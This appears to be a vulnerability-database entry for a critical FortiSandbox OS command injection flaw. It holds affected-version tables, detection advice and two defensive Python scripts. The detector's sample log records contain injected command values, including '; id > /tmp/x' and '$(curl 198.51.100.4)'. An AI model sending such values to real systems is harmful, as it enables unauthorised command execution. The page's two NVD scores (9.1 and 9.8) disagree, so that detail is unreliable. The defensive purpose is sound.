cvebase
CVE-2026-25089
published 2026-06-09

CVE-2026-25089: An improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5…

Priority: P1 (94) · Critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW: VulnCheck KEV · Exploited in the wild
EPSS: 23.39% (97.5th percentile)
An improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4 through 5.0.5, and FortiSandbox PaaS 5.0.4 through 5.0.5 may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests.

Affected (12 ranges)

Vendor     Product             Version range           Fixed in
fortinet   fortinet            (no version range given)
fortinet   fortisandbox        (no version range given)
fortinet   fortisandbox        4.2.0 – 4.2.8           (none listed)
fortinet   fortisandbox        4.2.1 – 4.2.8           (none listed)
fortinet   fortisandbox        >= 4.4.0, < 4.4.9       4.4.9
fortinet   fortisandbox        4.4.0 – 4.4.8           (none listed)
fortinet   fortisandbox        >= 5.0.0, < 5.0.6       5.0.6
fortinet   fortisandbox        5.0.0 – 5.0.5           (none listed)
fortinet   fortisandbox_cloud  >= 5.0.4, < 5.0.6       5.0.6
fortinet   fortisandbox_cloud  5.0.4 – 5.0.5           (none listed)
fortinet   fortisandbox_paas   >= 5.0.4, < 5.0.6       5.0.6
fortinet   fortisandbox_paas   5.0.4 – 5.0.5           (none listed)

Note: the advisory text says "4.2 all versions" with no fixed release for that branch, while the range rows above stop at 4.2.8; treat every 4.2.x build as affected.
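To turn the table above into something an asset inventory can apply, the following is an added example (not Fortinet's or cvebase's code). It encodes the ranges exactly as listed on this page, treats the whole 4.2 branch as affected with no fix (as the advisory text says), and maps the Cloud and PaaS products to their narrower 5.0.4–5.0.5 window. The product keys (`fortisandbox`, `fortisandbox_cloud`, `fortisandbox_paas`) are the page's own; the function names are mine.

```python
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Added example data, copied from the "Affected" table on this page:
# (product key, lowest affected, highest affected, fixed-in or None when no fix is listed).
# The 4.2 branch is open-ended because the advisory says "4.2 all versions".
AFFECTED_RANGES = [
    ("fortisandbox",       (4, 2, 0), (4, 2, 10**6), None),      # no fixed release listed
    ("fortisandbox",       (4, 4, 0), (4, 4, 8),     (4, 4, 9)),
    ("fortisandbox",       (5, 0, 0), (5, 0, 5),     (5, 0, 6)),
    ("fortisandbox_cloud", (5, 0, 4), (5, 0, 5),     (5, 0, 6)),
    ("fortisandbox_paas",  (5, 0, 4), (5, 0, 5),     (5, 0, 6)),
]


def parse_version(text: str) -> Version:
    """Parse 'major.minor[.patch]' into a comparable tuple; '4.2' becomes (4, 2, 0)."""
    parts = text.strip().split(".")
    if not 2 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised FortiSandbox version string: {text!r}")
    nums = [int(p) for p in parts]
    if len(nums) == 2:
        nums.append(0)
    return nums[0], nums[1], nums[2]


def check(product: str, version: str) -> Tuple[bool, Optional[str]]:
    """Return (affected, fixed_in) for a product/version pair.

    fixed_in is None when the build is not affected or when the page lists
    no fixed release for that branch (the 4.2 case), so callers must not
    read None as "safe".
    """
    v = parse_version(version)
    for prod, lo, hi, fixed in AFFECTED_RANGES:
        if prod == product and lo <= v <= hi:
            return True, (".".join(map(str, fixed)) if fixed else None)
    return False, None


if __name__ == "__main__":
    # Constructed inventory lines, not real appliance data.
    for prod, ver in [("fortisandbox", "5.0.5"), ("fortisandbox", "4.2.3"),
                      ("fortisandbox_cloud", "5.0.3"), ("fortisandbox_paas", "5.0.4")]:
        affected, fix = check(prod, ver)
        print(f"{prod} {ver}: affected={affected} fixed_in={fix}")
```

Because the 4.2 row has no fixed release, `check()` returns `(True, None)` for it; an inventory script should escalate that case (migration off 4.2) rather than waiting for a patch that the page does not list.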

Detection & IOCs (extracted from sources)

  • CVE-2026-25089 is exploited via specifically crafted HTTP requests to the FortiSandbox web UI; monitor for anomalous or malformed HTTP requests reaching FortiSandbox management interfaces from unauthenticated sources.
  • The vulnerable feature is the 'start vnc' functionality, which accepts JSON input; inspect JSON-bodied HTTP requests directed at the VNC-related API endpoint for OS command injection patterns (CWE-78) such as shell metacharacters and command substitution in string values.
  • Active exploitation of CVE-2026-25089 has been observed in the wild; treat any exposed FortiSandbox management interface as actively targeted and prioritize detection and patching.
  • The circulating exploit for CVE-2026-25089 shows signs of AI-generated development and is reportedly faulty; no fully working public exploit has been disclosed, but attempted exploitation activity should still be expected and should itself be alerted on.
  • Affected versions span FortiSandbox 5.0.0–5.0.5, 4.4.0–4.4.8, all 4.2.x versions, FortiSandbox Cloud 5.0.4–5.0.5, and FortiSandbox PaaS 5.0.4–5.0.5; scope detection rules accordingly.
  • This is a second-order OS command injection (CWE-78) via JSON input: the injected payload may be stored and executed later rather than at request time, so detection keyed only on the request that triggers execution may miss it. Inspect the JSON values at submission time, when the payload first arrives, rather than only correlating with later process activity.
  • Sources disagree on the CVSS score: one cites NVD at 9.1, while Fortinet's own PSIRT advisory rates it 9.8 (Critical); use 9.8 for internal risk prioritization.
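The two detection points above (JSON-bodied requests to the VNC endpoint, and the second-order nature of the injection) can be combined into one submission-time check. The following is an added example, not code from the page, from Fortinet or from any source it cites. It scans constructed reverse-proxy style records (one JSON object per line; not real FortiSandbox logs), URL-decodes every string value inside the JSON body, and flags shell metacharacters and command substitution. The endpoint path `/api/vnc/start` and the record fields are placeholders: the page names the 'start vnc' feature but not its URL, so the `VNC_PATH` pattern must be tuned to the real endpoint before use.

```python
import json
import re
from typing import Dict, Iterator, List

# Constructed sample records (assumption: a proxy or WAF in front of the
# management UI logs src, method, path, whether the session was authenticated,
# and the raw request body). The path is a placeholder, not the real endpoint.
SAMPLE_LOG = r'''
{"src": "203.0.113.7", "method": "POST", "path": "/api/vnc/start", "auth": false, "body": "{\"host\": \"10.0.0.5\", \"port\": 5900}"}
{"src": "203.0.113.9", "method": "POST", "path": "/api/vnc/start", "auth": false, "body": "{\"host\": \"10.0.0.5; id > /tmp/x\", \"port\": 5900}"}
{"src": "198.51.100.4", "method": "POST", "path": "/api/vnc/start", "auth": false, "body": "{\"host\": \"10.0.0.5%60id%60\", \"port\": \"5900\"}"}
{"src": "10.1.1.1", "method": "GET", "path": "/api/status", "auth": true, "body": ""}
{"src": "10.1.1.2", "method": "POST", "path": "/api/vnc/start", "auth": true, "body": "{\"opts\": {\"display\": \"$(curl 198.51.100.4)\"}}"}
'''

# Characters that let a value escape a shell word: command separators, pipes,
# backticks, newlines, $( ) / ${ } substitution, and redirection into a path.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{|>\s*/")

# Placeholder pattern for the VNC-related endpoint; tune to the real path.
VNC_PATH = re.compile(r"/vnc", re.IGNORECASE)


def iter_strings(obj) -> Iterator[str]:
    """Yield every string value in a nested JSON structure (dicts, lists, scalars)."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from iter_strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from iter_strings(value)


def suspicious_values(body: str) -> List[str]:
    """Return the JSON string values in body that contain shell metacharacters.

    Values are URL-decoded first so that %60 (backtick) and %3B (semicolon)
    are caught. Non-JSON bodies yield no hits rather than an exception.
    """
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return []
    from urllib.parse import unquote
    return [unquote(s) for s in iter_strings(data) if SHELL_META.search(unquote(s))]


def scan(log_text: str) -> List[Dict]:
    """Flag requests to the VNC endpoint whose JSON body carries injection metacharacters.

    The check runs on the request that stores the value, which is what a
    second-order injection requires: the later command execution may not
    produce a request to correlate against.
    """
    alerts = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        if not VNC_PATH.search(rec.get("path", "")):
            continue
        hits = suspicious_values(rec.get("body", ""))
        if hits:
            alerts.append({
                "src": rec["src"],
                "auth": rec["auth"],
                "values": hits,
                # Unauthenticated reach is what makes this CVE pre-auth RCE.
                "severity": "high" if not rec["auth"] else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

A hostname or port field on a VNC start request has no legitimate reason to contain `;`, a backtick or `$(`, so this rule is narrow enough to run without much tuning; the remaining work is replacing the placeholder path and field names with whatever the real proxy in front of the appliance records.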

CVSS provenance

NVD        v3.1  9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck        9.8  CRITICAL